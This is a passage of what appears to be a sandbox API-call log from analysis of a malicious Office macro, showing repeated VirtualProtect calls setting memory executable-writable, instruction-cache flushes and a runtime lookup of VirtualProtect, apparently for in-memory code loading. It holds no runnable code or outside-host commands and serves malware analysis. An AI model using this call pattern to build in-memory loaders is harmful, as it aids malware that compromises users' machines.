(hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0116.156] GetCurrentProcess () returned 0xffffffff [0116.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0116.156] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.157] GetCurrentProcess () returned 0xffffffff [0116.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0116.157] GetCurrentProcess () returned 0xffffffff [0116.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0116.157] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.157] GetCurrentProcess () returned 0xffffffff [0116.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0116.157] GetCurrentProcess () returned 0xffffffff [0116.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0116.158] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.158] GetCurrentProcess () returned 0xffffffff [0116.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0116.158] GetCurrentProcess () returned 0xffffffff [0116.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0116.158] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.159] GetCurrentProcess () returned 0xffffffff [0116.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0116.159] GetCurrentProcess () returned 0xffffffff [0116.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0116.159] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.159] GetCurrentProcess () returned 0xffffffff [0116.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0116.159] GetCurrentProcess () returned 0xffffffff [0116.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0116.159] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.160] GetCurrentProcess () returned 0xffffffff [0116.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0116.160] GetCurrentProcess () returned 0xffffffff [0116.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0116.160] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.160] GetCurrentProcess () returned 0xffffffff [0116.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0116.160] GetCurrentProcess () returned 0xffffffff [0116.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0116.160] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.161] GetCurrentProcess () returned 0xffffffff [0116.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0116.161] GetCurrentProcess () returned 0xffffffff [0116.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0116.161] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.161] GetCurrentProcess () returned 0xffffffff [0116.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0116.161] GetCurrentProcess () returned 0xffffffff [0116.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0116.162] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.162] GetCurrentProcess () returned 0xffffffff [0116.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0116.162] GetCurrentProcess () returned 0xffffffff [0116.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0116.162] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.163] GetCurrentProcess () returned 0xffffffff [0116.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0116.163] GetCurrentProcess () returned 0xffffffff [0116.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0116.163] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.163] GetCurrentProcess () returned 0xffffffff [0116.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0116.163] GetCurrentProcess () returned 0xffffffff [0116.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0116.163] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.164] GetCurrentProcess () returned 0xffffffff [0116.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0116.164] GetCurrentProcess () returned 0xffffffff [0116.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0116.164] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.165] GetCurrentProcess () returned 0xffffffff [0116.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0116.165] GetCurrentProcess () returned 0xffffffff [0116.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0116.165] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.166] GetCurrentProcess () returned 0xffffffff [0116.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0116.166] GetCurrentProcess () returned 0xffffffff [0116.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0116.166] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.166] GetCurrentProcess () returned 0xffffffff [0116.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0116.167] GetAsyncKeyState (vKey=3) returned 0 [0116.167] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0116.167] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0116.168] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0116.168] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0116.168] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0116.168] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0116.168] VarAdd (in: pvarLeft=0x198068, pvarRight=0x198018, pvarResult=0x198048 | out: pvarResult=0x198048) returned 0x0 [0116.168] SetErrorMode (uMode=0x8001) returned 0x8001 [0116.168] _stricmp (_Str1="kernel32", _Str2="VBE6.DLL") returned -11 [0116.168] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0116.169] SetErrorMode (uMode=0x8001) returned 0x8001 [0116.169] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0116.169] VirtualProtect (in: lpAddress=0x11892020, dwSize=0x15fab2, flNewProtect=0x40, lpflOldProtect=0x197fdc | out: lpflOldProtect=0x197fdc*=0x4) returned 1 [0116.957] GetLastError () returned 0x5 [0116.957] GetAsyncKeyState (vKey=3) returned 0 [0116.962] CRetailMalloc_Alloc () returned 0xcb7ad70 [0116.962] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.962] memcpy (in: _Dst=0xd015270, _Src=0x1978a4, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0116.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a4186, cbMultiByte=13, lpWideCharStr=0x11460228, cchWideChar=28 | out: lpWideCharStr="AChdywmAbLxco") returned 13 [0116.962] memcpy (in: _Dst=0xcb3d038, _Src=0x11460224, _Size=0x20 | out: _Dst=0xcb3d038) returned 0xcb3d038 [0116.962] memcpy (in: _Dst=0xd015168, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.962] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.962] memcpy (in: _Dst=0xd015168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.962] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a41a4, cbMultiByte=12, lpWideCharStr=0x11460938, cchWideChar=26 | out: lpWideCharStr="rlsuO4sYe_eK") returned 12 [0116.962] CRetailMalloc_Alloc () returned 0xcb3d088 [0116.962] memcpy (in: _Dst=0xcb3d09c, _Src=0x11460934, _Size=0x1e | out: _Dst=0xcb3d09c) returned 0xcb3d09c [0116.962] memcpy (in: _Dst=0xd01516c, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0116.962] memcpy (in: _Dst=0xd01516c, _Src=0x197888, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0116.963] memcpy (in: _Dst=0xd015170, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0116.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a41be, cbMultiByte=7, lpWideCharStr=0x11460cde, cchWideChar=16 | out: lpWideCharStr="VUfXb8n") returned 7 [0116.963] memcpy (in: _Dst=0xcb3d0c0, _Src=0x11460cda, _Size=0x14 | out: _Dst=0xcb3d0c0) returned 0xcb3d0c0 [0116.963] memcpy (in: _Dst=0xd015174, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0116.963] memcpy (in: _Dst=0xd015174, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0116.963] memcpy (in: _Dst=0x1976cc, _Src=0x197740, _Size=0x8 | out: _Dst=0x1976cc) returned 0x1976cc [0116.963] memcpy (in: _Dst=0xcb698e8, _Src=0x1976cc, _Size=0x8 | out: _Dst=0xcb698e8) returned 0xcb698e8 [0116.963] CRetailMalloc_Alloc () returned 0xcb6eef0 [0116.963] CRetailMalloc_Free () returned 0x1 [0116.963] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e9a, cbMultiByte=7, lpWideCharStr=0x1976a4, cchWideChar=8 | out: lpWideCharStr="—–————") returned 7 [0116.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c01de, cbMultiByte=7, lpWideCharStr=0x197704, cchWideChar=8 | out: lpWideCharStr="—–————") returned 7 [0116.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c01de, cbMultiByte=7, lpWideCharStr=0x197704, cchWideChar=8 | out: lpWideCharStr="—–————") returned 7 [0116.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c01de, cbMultiByte=7, lpWideCharStr=0x197704, cchWideChar=8 | out: lpWideCharStr="—–————") returned 7 [0116.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c01de, cbMultiByte=7, lpWideCharStr=0x197704, cchWideChar=8 | out: lpWideCharStr="—–————") returned 7 [0116.964] CRetailMalloc_Alloc () returned 0xcb27158 [0116.964] _mbscpy_s (in: _Dst=0xcb27158, _DstSizeInBytes=0x7, _Src=0x112c01de | out: _Dst=0xcb27158) returned 0x0 [0116.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0c2e, cbMultiByte=14, lpWideCharStr=0x197714, cchWideChar=15 | out: lpWideCharStr="_B_var_—–————") returned 14 [0116.965] _mbscpy_s (in: _Dst=0x19777c, _DstSizeInBytes=0x7, _Src=0x112c01de | out: _Dst=0x19777c) returned 0x0 [0116.965] CRetailMalloc_Free () returned 0x1 [0116.965] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0116.965] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.965] memcpy (in: _Dst=0xd015168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.965] memcpy (in: _Dst=0xd015168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.965] memcpy (in: _Dst=0xd015168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.965] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.965] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0117.017] memcpy (in: _Dst=0xcb7ae88, _Src=0x197924, _Size=0x18 | out: _Dst=0xcb7ae88) returned 0xcb7ae88 [0117.017] CRetailMalloc_Realloc () returned 0xcb7ad70 [0117.017] CRetailMalloc_Free () returned 0x1 [0117.017] GetCurrentProcess () returned 0xffffffff [0117.017] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0117.017] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.018] GetCurrentProcess () returned 0xffffffff [0117.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0117.018] GetCurrentProcess () returned 0xffffffff [0117.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0117.018] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.019] GetCurrentProcess () returned 0xffffffff [0117.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0117.019] GetCurrentProcess () returned 0xffffffff [0117.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0117.019] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.020] GetCurrentProcess () returned 0xffffffff [0117.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0117.020] GetCurrentProcess () returned 0xffffffff [0117.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0117.020] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.020] GetCurrentProcess () returned 0xffffffff [0117.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0117.020] GetCurrentProcess () returned 0xffffffff [0117.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0117.020] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.021] GetCurrentProcess () returned 0xffffffff [0117.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0117.021] GetCurrentProcess () returned 0xffffffff [0117.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0117.021] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.022] GetCurrentProcess () returned 0xffffffff [0117.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0117.022] GetCurrentProcess () returned 0xffffffff [0117.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0117.022] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.022] GetCurrentProcess () returned 0xffffffff [0117.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0117.022] GetCurrentProcess () returned 0xffffffff [0117.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0117.022] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.023] GetCurrentProcess () returned 0xffffffff [0117.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0117.023] GetCurrentProcess () returned 0xffffffff [0117.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0117.023] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.023] GetCurrentProcess () returned 0xffffffff [0117.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0117.024] GetCurrentProcess () returned 0xffffffff [0117.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0117.024] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.024] GetCurrentProcess () returned 0xffffffff [0117.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0117.024] GetCurrentProcess () returned 0xffffffff [0117.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0117.024] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.025] GetCurrentProcess () returned 0xffffffff [0117.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0117.025] GetCurrentProcess () returned 0xffffffff [0117.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0117.025] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.025] GetCurrentProcess () returned 0xffffffff [0117.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0117.025] GetCurrentProcess () returned 0xffffffff [0117.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0117.025] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.026] GetCurrentProcess () returned 0xffffffff [0117.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0117.026] GetCurrentProcess () returned 0xffffffff [0117.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0117.026] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.026] GetCurrentProcess () returned 0xffffffff [0117.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0117.026] GetCurrentProcess () returned 0xffffffff [0117.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0117.026] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.027] GetCurrentProcess () returned 0xffffffff [0117.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0117.027] GetCurrentProcess () returned 0xffffffff [0117.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0117.027] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.028] GetCurrentProcess () returned 0xffffffff [0117.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0117.028] GetCurrentProcess () returned 0xffffffff [0117.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0117.028] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.028] GetCurrentProcess () returned 0xffffffff [0117.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0117.028] GetCurrentProcess () returned 0xffffffff [0117.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0117.028] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.029] GetCurrentProcess () returned 0xffffffff [0117.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0117.029] GetCurrentProcess () returned 0xffffffff [0117.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0117.029] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.063] GetCurrentProcess () returned 0xffffffff [0117.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0117.063] GetCurrentProcess () returned 0xffffffff [0117.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0117.064] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.064] GetCurrentProcess () returned 0xffffffff [0117.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0117.064] GetCurrentProcess () returned 0xffffffff [0117.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0117.064] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.070] GetCurrentProcess () returned 0xffffffff [0117.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0117.070] GetCurrentProcess () returned 0xffffffff [0117.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0117.070] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.070] GetCurrentProcess () returned 0xffffffff [0117.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0117.070] GetCurrentProcess () returned 0xffffffff [0117.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0117.070] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.071] GetCurrentProcess () returned 0xffffffff [0117.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0117.071] GetCurrentProcess () returned 0xffffffff [0117.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0117.071] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.071] GetCurrentProcess () returned 0xffffffff [0117.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0117.071] GetCurrentProcess () returned 0xffffffff [0117.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0117.072] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.072] GetCurrentProcess () returned 0xffffffff [0117.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0117.072] GetCurrentProcess () returned 0xffffffff [0117.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0117.072] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 